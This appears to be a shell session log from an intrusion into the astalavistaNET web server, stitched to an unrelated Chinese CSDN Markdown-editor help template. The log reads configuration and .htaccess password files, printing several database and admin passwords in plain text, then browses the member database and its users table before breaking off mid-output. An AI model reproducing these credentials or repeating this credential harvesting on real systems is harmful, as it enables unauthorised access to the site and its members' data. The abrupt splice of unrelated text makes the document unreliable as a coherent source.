-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
sh-3.2$ head -20 index.php
<?PHP
/**
* Mainfile (external) for astalavistaNET v2.0
*
* @copyright Astalavista IT Engineering GmbH
* @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
* @version 1.0
*/
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
$dontStartSession = false;
} else {
$dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
sh-3.2$ cat com.conf.php
[snip]
//member-database
$_CONFIG['db_mem_server'] = ‘localhost’;
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
$_CONFIG['db_mem_user'] = ‘astanet_db’;
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = ‘localhost’;
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
$_CONFIG['db_ads_user'] = ‘astanet_db’;
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
$_CONFIG['db_rainbow_user'] = ‘dinu’;
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = ‘https://www.paypal.com/cgi-bin/webscr’;
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
$_CONFIG['sub_pp_business'] = ‘info@astalavista.net’;
$_CONFIG['sub_pp_noship'] = ‘1′;
$_CONFIG['sub_pp_referer'] = ‘https://www.paypal.com/’;
[snip]
sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off
sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
sh-3.2$ cd ..
sh-3.2$ cd _007
sh-3.2$ ls -la
total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
sh-3.2$ cat .htaccess
authType Basic
authName Admin
authUserFile /home/astanet/auth/.htadm_pwd
require valid-user
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT
sh-3.2$ mysql -u astanet_db -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or /g.
Your MySQL connection id is 275153
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ‘help;’ or ‘/h’ for help. Type ‘/c’ to clear the buffer.
mysql> show databases;
+———————–+
| Database |
+———————–+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem |
| test |
+———————–+
6 rows in set (0.00 sec)
mysql> use astanet_membersystem
Database changed
mysql> show tables;
+———————————–+
| Tables_in_astanet_membersystem |
+———————————–+
| blacklist_categories |
| blacklist_content |
| blacklist_levels |
| blacklist_mcset |
| dir_categories |
| dir_comments |
| dir_links |
| dir_temp |
| dir_votes |
| documents |
| documents_categories |
| email_content |
| email_settings |
| exploits |
| exploits_categories |
| exploittree_categories |
| exploittree_exploits |
| home_values |
| iso_countries |
| links_categories |
| links_records |
| links_unauth |
| links_votes |
| log |
| news_categories |
| news_comments |
| news_emoticons |
| news_latest |
| news_messages |
| news_statistics |
| news_votes |
| prices_content |
| prices_offers |
| rss_settings |
| sessions |
| stats_signups |
| u2u2 |
| u2u_contact |
| u2u_settings |
| user_keywords_selected_categories |
| users |
| users_ipn_test |
| users_keyword_values |
| users_profile |
| users_temp |
| users_upgrade |
+———————————–+
46 rows in set (0.00 sec)
mysql> describe users;
+————————–+————————————–+——+—–+———————+—————-+
| Field | Type | Null | Key | Default | Extra |
+————————–+————————————–+——+—–+———————+—————-+
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
| user | varchar(50) | NO | | | |
| nickname | varchar(30) | NO | MUL | anonymous | |
| password | varchar(30) | NO | | | |
| userlevel | tinyint(3) | YES | MUL | NULL | |
| exp | int(8) unsigned | NO | | 0 | |
| email | varchar(50) | NO | | | |
| ip | varchar(15) | NO | | 0 | |
| proxy | set(’0′,’1′) | NO | | 0 | |
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
| anz_in | tinyint(1) | NO | | -1 | |
| status | tinyint(1) unsigned | NO | | 0 | |
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
| freemember | set(’0′,’1′) &
给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:
- 全新的界面设计 ,将会带来全新的写作体验;
- 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
- 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示;
- 全新的 KaTeX数学公式 语法;
- 增加了支持甘特图的mermaid语法1 功能;
- 增加了 多屏幕编辑 Markdown文章功能;
- 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间;
- 增加了 检查列表 功能。
功能快捷键
撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G
合理的创建标题,有助于目录的生成
直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。
如何改变文本的样式
强调文本 强调文本
加粗文本 加粗文本
标记文本
删除文本
引用文本
H2O is是液体。
210 运算结果是 1024.
插入链接与图片
链接: link.
图片: 
带尺寸的图片:
当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。
如何插入一段漂亮的代码片
去博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片.
// An highlighted block var foo = 'bar'; 生成一个适合你的列表
- 项目
- 项目
- 项目
- 项目
- 项目1
- 项目2
- 项目3
- 计划任务
- 完成任务
创建一个表格
一个简单的表格是这么创建的:
| 项目 | Value |
|---|---|
| 电脑 | $1600 |
| 手机 | $12 |
| 导管 | $1 |
设定内容居中、居左、居右
使用:---------:居中
使用:----------居左
使用----------:居右
| 第一列 | 第二列 | 第三列 |
|---|---|---|
| 第一列文本居中 | 第二列文本居右 | 第三列文本居左 |
SmartyPants
SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:
| TYPE | ASCII | HTML |
|---|---|---|
| Single backticks | 'Isn't this fun?' | ‘Isn’t this fun?’ |
| Quotes | "Isn't this fun?" | “Isn’t this fun?” |
| Dashes | -- is en-dash, --- is em-dash | – is en-dash, — is em-dash |
创建一个自定义列表
-
Markdown
- Text-to- HTML conversion tool Authors
- John
- Luke
如何创建一个注脚
一个具有注脚的文本。2
注释也是必不可少的
Markdown将文本转换为 HTML。
KaTeX数学公式
您可以使用渲染LaTeX数学表达式 KaTeX:
Gamma公式展示 Γ ( n ) = ( n − 1 ) ! ∀ n ∈ N \Gamma(n) = (n-1)!\quad\forall n\in\mathbb N Γ(n)=(n−1)!∀n∈N 是通过欧拉积分
Γ ( z ) = ∫ 0 ∞ t z − 1 e − t d t   . \Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,. Γ(z)=∫0∞tz−1e−tdt.
你可以找到更多关于的信息 LaTeX 数学表达式here.
新的甘特图功能,丰富你的文章
gantt
dateFormat YYYY-MM-DD
title Adding GANTT diagram functionality to mermaid
section 现有任务
已完成 :done, des1, 2014-01-06,2014-01-08
进行中 :active, des2, 2014-01-09, 3d
计划一 : des3, after des2, 5d
计划二 : des4, after des3, 5d
- 关于 甘特图 语法,参考 这儿,
UML 图表
可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图::
这将产生一个流程图。:
- 关于 Mermaid 语法,参考 这儿,
FLowchart流程图
我们依旧会支持flowchart的流程图:
- 关于 Flowchart流程图 语法,参考 这儿.
导出与导入
导出
如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ,生成一个.md文件或者.html文件进行本地保存。
导入
如果你想加载一篇你写过的.md文件或者.html文件,在上方工具栏可以选择导入功能进行对应扩展名的文件导入,
继续你的创作。
注脚的解释 ↩︎
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
